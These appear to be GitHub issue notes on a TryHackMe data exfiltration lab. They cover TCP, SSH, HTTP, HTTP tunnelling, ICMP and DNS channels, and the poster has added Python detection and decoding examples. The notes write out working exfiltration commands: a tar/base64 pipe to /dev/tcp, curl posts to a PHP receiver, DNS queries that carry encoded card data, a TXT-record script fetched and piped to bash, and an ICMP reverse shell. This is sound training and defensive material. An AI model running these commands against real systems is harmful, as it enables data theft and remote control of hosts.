Open WDavid404 opened 7 months ago
If we are in a well-secured environment, then this kind of exfiltration is not recommended. This exfiltration type is easy to detect because we rely on non-standard protocols.
Besides the TCP socket, we will also use various other techniques, including data encoding and archiving. One of the benefits of this technique is that it encodes the data during transmission and makes it harder to examine.
The diagram shows that two hosts communicate over TCP on port 1337.
Steps:
thm@jump-box$ nc -lvp 8080 > /tmp/task4-creds.data
root@AttackBox$ ssh thm@MACHINE_IP -p 2022
thm@victim1:$ tar zcf - <target dir>/ | base64 | dd conv=ebcdic > /dev/tcp/192.168.0.133/8080
thm@jump-box:/tmp/$ dd conv=ascii if=task4-creds.data |base64 -d > task4-creds.tar
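The receiving end of the pipeline above, reconstructed in Python as an added example (not code from the TryHackMe room): it builds a constructed gzipped tar in memory, applies the same base64-then-EBCDIC transformation the sender uses, then shows how an analyst holding the captured bytes (from the jump box file or a pcap) can recognise the EBCDIC-wrapped base64 and recover the archive contents. It assumes Python's cp037 codec agrees with dd's conv=ebcdic/conv=ascii tables for the base64 alphabet and newline, which is all that crosses the socket.

```python
import base64
import codecs
import io
import tarfile

# Assumption: cp037 matches dd's EBCDIC table for these characters (letters,
# digits, '+', '/', '=' and newline), the only bytes a base64 stream contains.
B64_ALPHABET = set(b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=\n")


def build_sample_archive() -> bytes:
    """Constructed stand-in for `tar zcf - <target dir>/`: a tar.gz with one file."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w:gz") as tar:
        payload = b"thm:tryhackme\n"
        info = tarfile.TarInfo(name="task4/creds.txt")
        info.size = len(payload)
        tar.addfile(info, io.BytesIO(payload))
    return buf.getvalue()


def encode_like_sender(archive: bytes) -> bytes:
    """`base64 | dd conv=ebcdic`: 76-column base64 lines, then ASCII->EBCDIC byte mapping."""
    b64_text = base64.encodebytes(archive).decode("ascii")
    return codecs.encode(b64_text, "cp037")


def looks_like_ebcdic_base64(blob: bytes) -> bool:
    """Triage check for a captured stream: after EBCDIC->ASCII only base64
    characters remain. Plain ASCII text or binary data fails this immediately."""
    try:
        ascii_bytes = blob.decode("cp037").encode("ascii")
    except UnicodeError:
        return False
    return all(b in B64_ALPHABET for b in ascii_bytes)


def decode_capture(blob: bytes) -> bytes:
    """`dd conv=ascii | base64 -d` on the receiving side; returns the raw tar.gz bytes."""
    return base64.b64decode(blob.decode("cp037"))


def list_members(archive: bytes) -> dict:
    """Inventory what was exfiltrated: {member name: content} for a tar.gz."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:gz") as tar:
        return {m.name: tar.extractfile(m).read() for m in tar.getmembers() if m.isfile()}


if __name__ == "__main__":
    captured = encode_like_sender(build_sample_archive())
    print("EBCDIC-wrapped base64:", looks_like_ebcdic_base64(captured))
    print(list_members(decode_capture(captured)))
```

The triage check is the detection-relevant part: a stream in which every byte maps back to the base64 alphabet through the EBCDIC table is not something a legitimate application produces, so it is a cheap signature for this particular obfuscation.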
To transfer data over SSH, we can use either the Secure Copy Protocol (SCP) or the SSH client itself.
In the case that we cannot use SCP, we will focus more on the SSH client.
E.g. exfiltrating data from the victim1 machine:
thm@victim1:$ tar cf - <dir>/ | ssh thm@jump.thm.com "cd /tmp/; tar xpf -"
SSH clients provide a way to execute a single command without opening a full session: "cd /tmp/; tar xpf -" changes the directory and unarchives the data passed on stdin on the jump machine.
Approach: 1. Set up an HTTP or HTTPS web server on the attacker server that handles the incoming data requests. For example, the contact.php file saves the received data as the file http.bs64 in the /tmp directory:
<?php
// Receives the body of curl --data "file=..." and writes the raw value to disk.
if (isset($_POST['file'])) {
    $file = fopen("/tmp/http.bs64", "w");
    fwrite($file, $_POST['file']);   // still base64, but form decoding has turned '+' into spaces
    fclose($file);
}
?>
2. Run on the victim machine:
thm@victim1:~$ curl --data "file=$(tar zcf - task6 | base64)" http://web.thm.com/contact.php
thm@web:~$ sudo sed -i 's/ /+/g' /tmp/http.bs64
The sed step is needed because curl --data sends the base64 text verbatim, and PHP's form decoding turns every '+' into a space; replacing the spaces restores the original base64. Then decode the file:
thm@web:~$ cat /tmp/http.bs64 | base64 -d | tar xvfz - tmp/task6/
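An added example (not code from the room) showing, in Python, why the sed step is necessary: the same application/x-www-form-urlencoded decoding PHP applies to $_POST turns '+' into spaces, which breaks base64 until the characters are restored. The request body is constructed inline; the function names are my own.

```python
import base64
import binascii
from urllib.parse import parse_qs, quote_plus


def build_body(raw: bytes, url_encode: bool = False) -> str:
    """Constructed request body. With url_encode=False the base64 is sent verbatim
    (what curl --data does); with url_encode=True it is percent-encoded, so '+' travels as %2B."""
    b64 = base64.b64encode(raw).decode("ascii")
    return "file=" + (quote_plus(b64) if url_encode else b64)


def php_style_form_decode(body: str) -> str:
    """What $_POST['file'] ends up holding: form decoding maps '+' to ' '."""
    return parse_qs(body)["file"][0]


def try_b64decode(text: str):
    """Strict decode; returns None when the text is no longer valid base64."""
    try:
        return base64.b64decode(text, validate=True)
    except binascii.Error:
        return None


def repair_and_decode(text: str) -> bytes:
    """The sed 's/ /+/g' step: put the '+' characters back, then decode."""
    return base64.b64decode(text.replace(" ", "+"), validate=True)


if __name__ == "__main__":
    sample = b"\xfb\xff\xfe"          # constructed bytes whose base64 is "+//+"
    received = php_style_form_decode(build_body(sample))
    print(repr(received), try_b64decode(received), repair_and_decode(received))
```

The strict `validate=True` is deliberate: the default lenient decoder silently discards the spaces and would then fail only on padding, which hides the real cause of the corruption.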
Tunneling over the HTTP protocol technique encapsulates other protocols and sends them back and forth via the HTTP protocol. HTTP tunneling sends and receives many HTTP requests depending on the communication channel!
Case:
For HTTP Tunneling, we will be using a Neo-reGeorg tool to establish a communication channel to access the internal network devices.
root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py generate -k thm
The previous command generates encrypted Tunneling clients with thm key in the neoreg_servers/ directory.
Note that there are various extensions available, including PHP, ASPX, JSP, etc.
In our scenario, we will be uploading the tunnel.php file via the uploader machine.
Once we have uploaded the file, we can access it at the following URL: http://MACHINE_IP/uploader/files/tunnel.php.
root@AttackBox:/opt/Neo-reGeorg# python3 neoreg.py -k thm -u http://MACHINE_IP/uploader/files/tunnel.php
Once it is connected to the tunneling client, we can use the tunnel as a SOCKS proxy bound on our local machine, 127.0.0.1, on port 1080.
For example, if we want to access the app.thm.com, which has an internal IP address 172.20.0.121 on port 80, we can use the curl command with --socks5 argument. We can also use other proxy applications, such as ProxyChains, FoxyProxy, etc., to communicate with the internal network.
root@AttackBox:~$ curl --socks5 127.0.0.1:1080 http://172.20.0.121:80
Welcome to APP Server!
On a high level, the ICMP packet's structure contains a Data section that can include strings or copies of other information, such as the IPv4 header, used for error messages. The following diagram shows the Data section, which is optional to use.
Note that the Data field is optional and could either be empty or it could contain a random string during the communications. As an attacker, we can use the ICMP structure to include our data within the Data section and send it via ICMP packet to another machine.
With the -p argument, we can specify 16 bytes of data in hex representation to send through the packet. Note that the -p option is only available for Linux operating systems.
We need to convert the string to its hex representation and then pass it to the ping command with the -p option, as follows:
root@AttackBox$ echo "thm:tryhackme" | xxd -p
74686d3a7472796861636b6d650a
[*] xxd converts our string to hex
Then we can use the ping command with the Hex value we got from converting the thm:tryhackme.
root@AttackBox$ ping MACHINE_IP -c 1 -p 74686d3a7472796861636b6d650a
The Metasploit framework uses the same technique explained in the previous section.
However, it will capture incoming ICMP packets and wait for a Beginning of File (BOF) trigger value.
Once it is received, it writes to the disk until it gets an End of File (EOF) trigger value.
The following diagram shows the required steps for the Metasploit framework. Since we need the Metasploit Framework for this technique, then we need the AttackBox machine to perform this attack successfully.
step1:
msf5 > use auxiliary/server/icmp_exfil
msf5 auxiliary(server/icmp_exfil) > set BPF_FILTER icmp and not src ATTACKBOX_IP
BPF_FILTER => icmp and not src ATTACKBOX_IP
msf5 auxiliary(server/icmp_exfil) > set INTERFACE eth0
INTERFACE => eth0
msf5 auxiliary(server/icmp_exfil) > run
[*] ICMP Listener started on eth0 (ATTACKBOX_IP). Monitoring for trigger packet containing ^BOF
[*] Filename expected in initial packet, directly following trigger (e.g. ^BOFfilename.ext)
step2: SSH to the victim machine and use the nping tool
thm@jump-box$ ssh thm@icmp.thm.com
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "admin1:password1"
Starting Nping 0.7.80 ( https://nmap.org/nping ) at 2022-04-25 23:23 EEST
SENT (0.0369s) ICMP [192.168.0.121 > ATTACKBOX_IP Echo request (type=8/code=0) id=7785 seq=1] IP [ttl=64 id=40595 iplen=39 ]
RCVD (0.0376s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=63 id=12656 iplen=39 ]
RCVD (0.0755s) ICMP [ATTACKBOX_IP > 192.168.0.121 Echo reply (type=0/code=0) id=7785 seq=1] IP [ttl=31 id=60759 iplen=32 ]
Max rtt: 38.577ms | Min rtt: 0.636ms | Avg rtt: 19.606ms
Raw packets sent: 1 (39B) | Rcvd: 2 (71B) | Lost: 0 (0.00%)
Nping done: 1 IP address pinged in 1.06 seconds
If everything is set correctly, the Metasploit framework should identify the trigger value and wait for the data to be written to disk. Let's start sending the required data and the end of the file trigger value from the ICMP machine.
thm@icmp-host:~# sudo nping --icmp -c 1 ATTACKBOX_IP --data-string "EOF"
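An added example (not code from the room or from Metasploit) that shows the defensive side of the two techniques above, ping -p and the icmp_exfil listener: a small parser for IPv4/ICMP echo packets that pulls out the Data section and reports why a packet's payload does not look like a normal ping. The packets are constructed inline from the page's values (the hex of thm:tryhackme, the admin1:password1 and EOF strings, the 192.168.0.121 and 192.168.0.133 addresses); the default-fill constants assume the standard Linux ping payload (8-byte timestamp followed by 0x10, 0x11, ...) and the standard Windows ping payload.

```python
import struct

# Default echo payloads a defender can whitelist (assumed: Linux ping fills
# 0x10.. after an 8-byte timestamp; Windows ping sends the 32-byte alphabet run).
LINUX_FILL = bytes(range(0x10, 0x40))
WINDOWS_FILL = b"abcdefghijklmnopqrstuvwabcdefghi"
TS = struct.pack("!II", 1650920580, 0)  # constructed timestamp slot


def icmp_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement checksum over the ICMP header + data."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return ~total & 0xFFFF


def build_echo_request(src: str, dst: str, payload: bytes, ident=0x1E69, seq=1) -> bytes:
    """Constructed IPv4 + ICMP echo request (no IP options), used only as demo input."""
    icmp = struct.pack("!BBHHH", 8, 0, 0, ident, seq) + payload
    icmp = icmp[:2] + struct.pack("!H", icmp_checksum(icmp)) + icmp[4:]
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(icmp), 0x9E93, 0, 64, 1, 0,
                     bytes(int(o) for o in src.split(".")),
                     bytes(int(o) for o in dst.split(".")))
    return ip + icmp


def parse_icmp(packet: bytes):
    """Return (src, dst, icmp_type, data) or None if this is not an IPv4 ICMP packet."""
    if len(packet) < 28 or packet[0] >> 4 != 4 or packet[9] != 1:
        return None
    ihl = (packet[0] & 0x0F) * 4
    icmp = packet[ihl:]
    if len(icmp) < 8:
        return None
    src = ".".join(str(b) for b in packet[12:16])
    dst = ".".join(str(b) for b in packet[16:20])
    return src, dst, icmp[0], icmp[8:]


def checksum_ok(packet: bytes) -> bool:
    ihl = (packet[0] & 0x0F) * 4
    return icmp_checksum(packet[ihl:]) == 0


def inspect_echo(packet: bytes) -> list:
    """Reasons an echo request/reply Data section looks like a covert channel; [] if benign or not echo."""
    parsed = parse_icmp(packet)
    if parsed is None or parsed[2] not in (0, 8):
        return []
    data = parsed[3]
    reasons = []
    if data.startswith(b"^BOF") or data == b"EOF":
        reasons.append("Metasploit icmp_exfil trigger marker")
    if data == WINDOWS_FILL or (len(data) == 56 and data[8:] == LINUX_FILL):
        return reasons                      # known default fill, nothing else to report
    if len(data) not in (32, 56):
        reasons.append("non-default payload size %d" % len(data))
    reasons.append("payload is not a default ping fill pattern")
    return reasons


def sample_packets() -> dict:
    """Constructed traffic: one normal ping, the ping -p packet, and the two nping packets."""
    pattern = bytes.fromhex("74686d3a7472796861636b6d650a")   # "thm:tryhackme\n" from xxd
    src, dst = "192.168.0.121", "192.168.0.133"
    return {
        "linux_ping": build_echo_request(src, dst, TS + LINUX_FILL),
        "ping_dash_p": build_echo_request(src, dst, TS + (pattern * 5)[8:56]),  # -p repeats the 16-byte pattern
        "nping_creds": build_echo_request(src, dst, b"admin1:password1"),
        "nping_eof": build_echo_request(src, dst, b"EOF"),
    }


if __name__ == "__main__":
    for name, pkt in sample_packets().items():
        print(name, parse_icmp(pkt)[3].hex(), inspect_echo(pkt))
```

The whitelist-then-flag structure matters: comparing the Data section against the handful of known default fills catches both the -p variant (the payload is the right length but the wrong bytes) and the nping variant (the payload is the wrong length entirely), without needing to know what was encoded.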
We will show how to execute commands over the ICMP protocol using the ICMPDoor tool. ICMPDoor is an open-source reverse shell written in Python3 and scapy. The tool uses the same concept we discussed earlier in this task, where an attacker utilizes the Data section within the ICMP packet. The only difference is that the attacker sends a command that needs to be executed on the victim's machine. Once the command is executed, the victim machine sends the execution output back within the Data section of an ICMP packet.
We need to set up C2 communication over the ICMP protocol between the JumpBox and the ICMP-Host machines.
thm@icmp-host:~$ sudo icmpdoor -i eth0 -d 192.168.0.133
thm@jump-box$ sudo icmp-cnc -i eth1 -d 192.168.0.121
shell: hostname
hostname
shell: icmp-host
[*] We requested to execute the hostname command and received icmp-host (the output of the hostname command executed on the victim machine).
Since DNS is not a transport protocol, many organizations don't regularly monitor the DNS protocol! The DNS protocol is allowed in almost all firewalls in any organization network. For those reasons, threat actors prefer using the DNS protocol to hide their communications.
The DNS protocol has limitations that need to be taken into consideration, which are as follows,
Based on these limitations, we can use a limited number of characters to transfer data over the domain name. If we have a large file, 10 MB for example, it may need more than 50000 DNS requests to transfer the file completely. Therefore, it will be noisy traffic and easy to notice and detect.
There are many use case scenarios, but the typical one is when the firewall blocks and filters all traffic. We can pass data or TCP/UDP packets through a firewall using the DNS protocol, but it is important to ensure that the DNS is allowed and resolving domain names to IP addresses.
Note:we must keep the whole URL under 255 characters, and each subdomain label can't exceed 63 characters.
thm@victim2:~$ cat task9/credit.txt | base64 | tr -d "\n"| fold -w18 | sed -r 's/.*/&.att.tunnel.com/'
TmFtZTogVEhNLXVzZX.att.tunnel.com
IKQWRkcmVzczogMTIz.att.tunnel.com
NCBJbnRlcm5ldCwgVE.att.tunnel.com
hNCkNyZWRpdCBDYXJk.att.tunnel.com
OiAxMjM0LTEyMzQtMT.att.tunnel.com
IzNC0xMjM0CkV4cGly.att.tunnel.com
ZTogMDUvMDUvMjAyMg.att.tunnel.com
pDb2RlOiAxMzM3Cg==.att.tunnel.com
[*] tr: replaces the specified characters, or deletes them (with the -d option)
[*] fold: wraps the input at the specified line width
[*] sed -r: use extended regular expressions
Another way: this time, we split every 18 characters with a dot ".", append the name server, and then use the dig command to send it over DNS:
thm@victim2:~$ cat task9/credit.txt |base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" | sed s/$/att.tunnel.com/ | awk '{print "dig +short " $1}' | bash
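An added example (not from the room) written from the defender's side of the two dig pipelines above: it scans a constructed DNS query log for the pattern they produce, long high-entropy mixed-case labels under one registered domain, and aggregates per domain so that a single odd hostname is not enough to raise an alert. The log format ("timestamp client qname qtype") and the two-label registered-domain rule are assumptions; the tunnel.com names are the ones the page's pipeline printed, while the benign names are constructed.

```python
import math
from collections import defaultdict

# Constructed query log. The tunnel.com lines are the labels produced by the
# fold/sed pipeline above (single-label form and the chained form from dig).
SAMPLE_LOG = """\
2022-04-25T23:30:01 192.168.0.121 www.tryhackme.com A
2022-04-25T23:30:02 192.168.0.121 TmFtZTogVEhNLXVzZX.att.tunnel.com A
2022-04-25T23:30:02 192.168.0.121 IKQWRkcmVzczogMTIz.att.tunnel.com A
2022-04-25T23:30:02 192.168.0.121 NCBJbnRlcm5ldCwgVE.att.tunnel.com A
2022-04-25T23:30:03 192.168.0.121 hNCkNyZWRpdCBDYXJk.att.tunnel.com A
2022-04-25T23:30:03 192.168.0.121 OiAxMjM0LTEyMzQtMT.att.tunnel.com A
2022-04-25T23:30:03 192.168.0.121 IzNC0xMjM0CkV4cGly.att.tunnel.com A
2022-04-25T23:30:04 192.168.0.121 ZTogMDUvMDUvMjAyMg.att.tunnel.com A
2022-04-25T23:30:04 192.168.0.121 pDb2RlOiAxMzM3Cg==.att.tunnel.com A
2022-04-25T23:30:12 192.168.0.121 TmFtZTogVEhNLXVzZX.IKQWRkcmVzczogMTIz.NCBJbnRlcm5ldCwgVE.hNCkNyZWRpdCBDYXJk.OiAxMjM0LTEyMzQtMT.IzNC0xMjM0CkV4cGly.ZTogMDUvMDUvMjAyMg.pDb2RlOiAxMzM3Cg==.att.tunnel.com A
2022-04-25T23:30:13 192.168.0.122 mail.google.com MX
2022-04-25T23:30:14 192.168.0.122 cdn-images-production.example.com A
2022-04-25T23:30:15 192.168.0.122 api.github.com A
"""


def shannon_entropy(s: str) -> float:
    """Bits per character; base64 labels score well above ordinary hostnames."""
    if not s:
        return 0.0
    counts = {c: s.count(c) for c in set(s)}
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def parse_line(line: str):
    """Assumed log layout: '<timestamp> <client> <qname> <qtype>'."""
    ts, client, qname, qtype = line.split()
    return ts, client, qname.rstrip("."), qtype   # keep case: mixed case is a signal


def registered_domain(qname: str, zone_labels: int = 2) -> str:
    """Assumption: the registered domain is the last two labels (tunnel.com)."""
    return ".".join(qname.split(".")[-zone_labels:]).lower()


def suspicious_labels(qname: str, zone_labels: int = 2) -> list:
    """Labels that look like encoded data: long, high entropy, mixed case or digits."""
    out = []
    for lab in qname.split(".")[:-zone_labels]:
        mixed = any(c.isupper() for c in lab) and any(c.islower() for c in lab)
        digits = any(c.isdigit() for c in lab)
        if len(lab) >= 16 and shannon_entropy(lab) >= 3.0 and (mixed or digits):
            out.append(lab)
    return out


def find_exfil_candidates(log_text: str, min_names: int = 5) -> dict:
    """Per registered domain: distinct suspicious names, querying clients, and an
    estimate of the bytes carried (base64 packs 6 bits per character)."""
    per_domain = defaultdict(lambda: {"names": set(), "clients": set(), "label_chars": 0})
    for line in log_text.splitlines():
        if not line.strip():
            continue
        _, client, qname, _ = parse_line(line)
        labs = suspicious_labels(qname)
        if not labs:
            continue
        d = per_domain[registered_domain(qname)]
        d["names"].add(qname)
        d["clients"].add(client)
        d["label_chars"] += sum(len(l) for l in labs)
    return {
        dom: {"distinct_names": len(d["names"]), "clients": sorted(d["clients"]),
              "approx_bytes": d["label_chars"] * 6 // 8}
        for dom, d in per_domain.items() if len(d["names"]) >= min_names
    }


if __name__ == "__main__":
    for dom, info in find_exfil_candidates(SAMPLE_LOG).items():
        print(dom, info)
```

The per-domain threshold is what keeps a single long CDN hostname from alerting; the approx_bytes figure is useful for scoping, since the page's own estimate (50000 queries for a 10 MB file) follows directly from the 6 bits per character.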
C2 frameworks use the DNS protocol for communication, such as sending a command execution request and receiving execution results over the DNS protocol. They also use the TXT DNS record to run a dropper to download extra files on a victim machine. This section simulates how to execute a bash script over the DNS protocol. We will be using the web interface to add a TXT DNS record to the tunnel.com domain name.
Approach: place an (encoded) script in a TXT DNS record, then have the victim machine query the domain with dig to retrieve the script content (after cleaning up and decoding the returned text, of course).
thm@victim2$ dig +short -t TXT script.tunnel.com | tr -d "\"" | base64 -d | bash
Steps:
https://code.kryo.se/iodine/ iodine lets you tunnel IPv4 data through a DNS server. This can be useful in situations where internet access is firewalled but DNS queries are allowed.
Data Exfiltration (data leakage)
How to use Data Exfiltration
There are three primary use case scenarios of data exfiltration, including: